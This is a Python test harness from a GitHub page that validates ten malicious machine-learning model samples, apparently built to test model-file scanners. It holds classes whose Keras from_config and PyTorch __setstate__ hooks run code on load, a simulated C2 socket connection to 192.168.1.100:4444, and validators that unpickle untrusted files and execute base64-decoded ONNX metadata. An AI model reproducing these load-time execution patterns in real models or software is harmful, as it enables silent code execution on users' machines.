-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathg3modeltest.py
More file actions
255 lines (235 loc) · 10.3 KB
/
g3modeltest.py
File metadata and controls
255 lines (235 loc) · 10.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
from torch import nn
import os
import subprocess
import pickle
import tensorflow as tf
import torch
import onnx
import onnxruntime as ort
import joblib
from zipfile import ZipFile
import base64
import sys
# Helper functions for validation
def check_file_exists(file_path, content=None):
    """Report whether *file_path* exists and, optionally, whether its contents match.

    Prints a [+]/[-] status line for existence. When *content* is given,
    a second status line reports whether the stripped file contents equal
    the stripped expected text. The return value reflects existence only;
    a content mismatch is printed but does not change the result.
    """
    if not os.path.exists(file_path):
        print(f"[-] {file_path} does not exist.")
        return False
    print(f"[+] {file_path} exists.")
    if content:
        with open(file_path, 'r') as f:
            file_content = f.read().strip()
        if content.strip() == file_content:
            print(f"[+] Content verified in {file_path}.")
        else:
            print(f"[-] Content not matched in {file_path}. Expected: '{content.strip()}', Found: '{file_content}'")
    return True
def check_onnx_metadata(model_path, key, expected_value):
    """Return True if the ONNX model at *model_path* carries a metadata
    property whose key equals *key* and whose value contains *expected_value*.

    Prints a [+]/[-] status line either way; any error while loading or
    inspecting the model is reported and treated as "not found".
    """
    try:
        props = onnx.load(model_path).metadata_props
        hit = any(p.key == key and expected_value in p.value for p in props)
        if hit:
            print(f"[+] Malicious metadata found: {key}")
        else:
            print(f"[-] Malicious metadata not found for key: {key}")
        return hit
    except Exception as e:
        print(f"[-] Error checking ONNX metadata: {e}")
        return False
def clean_tmp_directory():
    """Delete the scratch files the validators write under /tmp, if present.

    Reports each removal with a [+] line; files that do not exist are
    silently skipped.
    """
    for file_path in ('/tmp/malicious.txt', '/tmp/eicar.com'):
        if os.path.exists(file_path):
            os.remove(file_path)
            print(f"[+] Removed {file_path}")
# Define necessary functions and classes for self-containment
def c2_payload():
    """Simulate a command-and-control connection.

    Test-harness payload: attempts a TCP connection to a hard-coded
    private address (192.168.1.100:4444) and sends a single marker
    message. In most environments the connect fails; the failure is
    caught and reported as a simulated C2 attempt, which is the
    expected outcome during validation.
    """
    try:
        import socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.1.100', 4444))
        s.sendall(b'Connected')
        s.close()
    except Exception as e:
        print(f"[+] Simulated C2 connection (actual failed: {e})")
def eicar_payload():
    """Write the standard EICAR antivirus test string to /tmp/eicar.com.

    The EICAR string is the industry-standard, harmless test file used
    to confirm that antivirus/file scanners flag the artifact.
    """
    with open('/tmp/eicar.com', 'w') as f:
        f.write('X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
class MaliciousActivation:
    """Custom activation class with malicious behavior.

    Test artifact for Keras .h5 deserialization: the payload lives in
    ``from_config``, which Keras invokes while reconstructing the saved
    model, so merely loading the model triggers it (writes a marker file
    to /tmp and calls the module-level ``c2_payload`` simulation).
    """
    def __call__(self, x):
        # Identity activation — the model-side behavior is a no-op.
        return x
    def get_config(self):
        # Nothing to serialize; the payload fires on deserialization.
        return {}
    @staticmethod
    def from_config(config):
        # Invoked by Keras when rebuilding the object from a saved model.
        try:
            with open('/tmp/malicious.txt', 'w') as f:
                f.write('Malicious code executed! (Keras .h5)\n')
            c2_payload()
        except Exception as e:
            print(f"[-] Error executing malicious code in from_config: {e}")
        return MaliciousActivation()
class MaliciousModelForTestCase4(nn.Module):
    """PyTorch model with malicious behavior in __setstate__ for Test Case 4.

    Unpickling this model (torch.load with weights_only=False) invokes
    __setstate__, which writes a marker file and the EICAR test string.
    """
    def __init__(self):
        super(MaliciousModelForTestCase4, self).__init__()
        self.linear = nn.Linear(10, 1)
    def forward(self, x):
        return self.linear(x)
    def __setstate__(self, state):
        # Runs during unpickling: restore state, then drop test artifacts.
        super(MaliciousModelForTestCase4, self).__setstate__(state)
        os.system('echo "Malicious code executed! (PyTorch .pt)" > /tmp/malicious.txt')
        eicar_payload()
class MaliciousModelForTestCase10(nn.Module):
    """PyTorch model with malicious behavior in __setstate__ for Test Case 10.

    Unpickling this model writes the harmless EICAR antivirus test string
    to /tmp/eicar.com, exercising the encrypted-archive scenario.
    """
    def __init__(self):
        super(MaliciousModelForTestCase10, self).__init__()
        self.linear = nn.Linear(1, 1)
    def forward(self, x):
        return self.linear(x)
    def __setstate__(self, state):
        # Runs during unpickling: restore state, then write the EICAR file.
        super(MaliciousModelForTestCase10, self).__setstate__(state)
        with open('/tmp/eicar.com', 'w') as f:
            f.write('X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
# Validation functions for each test case
def validate_test_case_1():
    """Validate Test Case 1: script smuggled into a TF .pb model's assets.

    Runs the planted script (if present) and confirms it produced the
    expected marker and EICAR files; /tmp is cleaned before and after.
    """
    print("\n--- Validating Test Case 1 ---")
    clean_tmp_directory()
    script_path = os.path.join('malicious_model_tf_pb', 'assets', 'malicious_tf_pb.py')
    if not os.path.exists(script_path):
        print("[-] Malicious script not found.")
    else:
        try:
            subprocess.run(['python', script_path], check=True, capture_output=True, text=True)
            check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (TF .pb)')
            check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
        except subprocess.CalledProcessError as err:
            print(f"[-] Validation failed: {err.output}")
    clean_tmp_directory()
def validate_test_case_2():
    """Validate Test Case 2: payload in a Keras .h5 custom object.

    Loading the model with MaliciousActivation registered triggers its
    from_config payload; the marker file confirms execution.
    """
    print("\n--- Validating Test Case 2: Obfuscated Code in .h5 (Keras) + C2 Connection ---")
    clean_tmp_directory()
    try:
        custom = {'MaliciousActivation': MaliciousActivation}
        tf.keras.models.load_model('malicious_model_keras.h5', custom_objects=custom)
        check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Keras .h5)')
        print("[+] C2 connection attempt validated via simulation.")
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_3():
    """Validate Test Case 3: script planted in a trojanized SavedModel.

    Executes the planted asset script (if present) and checks for the
    marker file; /tmp is cleaned before and after.
    """
    print("\n--- Validating Test Case 3 ---")
    clean_tmp_directory()
    script_path = os.path.join('malicious_saved_model_trojanized', 'assets', 'malicious.py')
    if not os.path.exists(script_path):
        print("[-] Malicious script not found.")
    else:
        try:
            subprocess.run(['python', script_path], check=True, capture_output=True, text=True)
            check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Trojanized SavedModel)')
            print("[+] Data exfiltration attempt validated via simulation.")
        except subprocess.CalledProcessError as err:
            print(f"[-] Validation failed: {err.output}")
    clean_tmp_directory()
def validate_test_case_4():
    """Validate Test Case 4: PyTorch .pt whose __setstate__ runs on load.

    Registers the test class as a safe global, loads the pickle, then
    checks for the marker and EICAR artifacts.
    """
    print("\n--- Validating Test Case 4 ---")
    clean_tmp_directory()
    try:
        torch.serialization.add_safe_globals([MaliciousModelForTestCase4])
        torch.load('malicious_model_pytorch.pt', weights_only=False)
        check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (PyTorch .pt)')
        check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_5():
    """Validate Test Case 5: code execution on pickle deserialization.

    Unpickling the test file triggers its payload; the marker file
    confirms execution.
    """
    print("\n--- Validating Test Case 5 ---")
    clean_tmp_directory()
    try:
        with open('malicious_pkl_file.pkl', 'rb') as handle:
            pickle.load(handle)
        check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Pickle .pkl)')
        print("[+] C2 connection attempt validated via simulation.")
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_6():
    """Validate Test Case 6: payload strings hidden in ONNX metadata.

    Confirms the model loads under onnxruntime, then inspects its
    metadata for the planted key/value pairs.
    """
    print("\n--- Validating Test Case 6 ---")
    clean_tmp_directory()
    try:
        model_file = 'malicious_onnx_model_metadata.onnx'
        ort.InferenceSession(model_file)
        check_onnx_metadata(model_file, 'hidden_payload', 'Malicious code executed! (ONNX Metadata)')
        check_onnx_metadata(model_file, 'data_exfil', 'requests.post')
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_7():
    """Validate Test Case 7: base64 payload in ONNX node-attribute metadata.

    Decodes the first 'malicious_attr' metadata entry, executes it with a
    subprocess, and checks that the expected artifacts appeared.
    """
    print("\n--- Validating Test Case 7 ---")
    clean_tmp_directory()
    try:
        model_file = 'malicious_onnx_model_node_attributes.onnx'
        ort.InferenceSession(model_file)
        model = onnx.load(model_file)
        # Only the first matching entry is executed, mirroring a first-hit scan.
        payload = next((p.value for p in model.metadata_props if p.key == 'malicious_attr'), None)
        if payload is not None:
            subprocess.run(['python', '-c', base64.b64decode(payload).decode()], check=True)
        check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (ONNX Node Attributes)')
        check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_8():
    """Validate Test Case 8: code execution on joblib deserialization.

    Loading the joblib artifact triggers its payload; the marker file
    confirms execution.
    """
    print("\n--- Validating Test Case 8 ---")
    clean_tmp_directory()
    try:
        joblib.load('malicious_model_sklearn.joblib')
        check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Scikit-learn .joblib)')
        print("[+] C2 connection attempt validated via simulation.")
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_9():
    """Validate Test Case 9: forged ONNX model carrying exfiltration metadata.

    Confirms the model loads under onnxruntime, then checks for the
    planted 'data_exfil' metadata entry.
    """
    print("\n--- Validating Test Case 9 ---")
    clean_tmp_directory()
    try:
        model_file = 'forged_malicious_onnx_model.onnx'
        ort.InferenceSession(model_file)
        check_onnx_metadata(model_file, 'data_exfil', 'requests.post')
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
def validate_test_case_10():
    """Validate Test Case 10: password-protected zip wrapping a PyTorch model.

    Extracts the archive with the known password, loads the model (which
    writes the EICAR artifact on unpickle), checks the artifact, and
    removes the extracted model file.
    """
    print("\n--- Validating Test Case 10: Encrypted / Password-Protected Model Files + EICAR ---")
    clean_tmp_directory()
    try:
        with ZipFile('encrypted_model.zip', 'r') as archive:
            archive.extractall(pwd=b'secret')
        torch.load('model.pt', weights_only=False)
        check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
        if os.path.exists('model.pt'):
            os.remove('model.pt')
    except Exception as err:
        print(f"[-] Validation failed: {err}")
    clean_tmp_directory()
# Main function to run all validations
def validate_all_test_cases():
    """Run all ten validation scenarios in order, printing per-case results."""
    print("Starting validation of all 10 test cases...\n")
    cases = (
        validate_test_case_1,
        validate_test_case_2,
        validate_test_case_3,
        validate_test_case_4,
        validate_test_case_5,
        validate_test_case_6,
        validate_test_case_7,
        validate_test_case_8,
        validate_test_case_9,
        validate_test_case_10,
    )
    for case in cases:
        case()
    print("\nValidation of all test cases completed.")
# Entry point: run the full validation suite when executed as a script.
if __name__ == "__main__":
    validate_all_test_cases()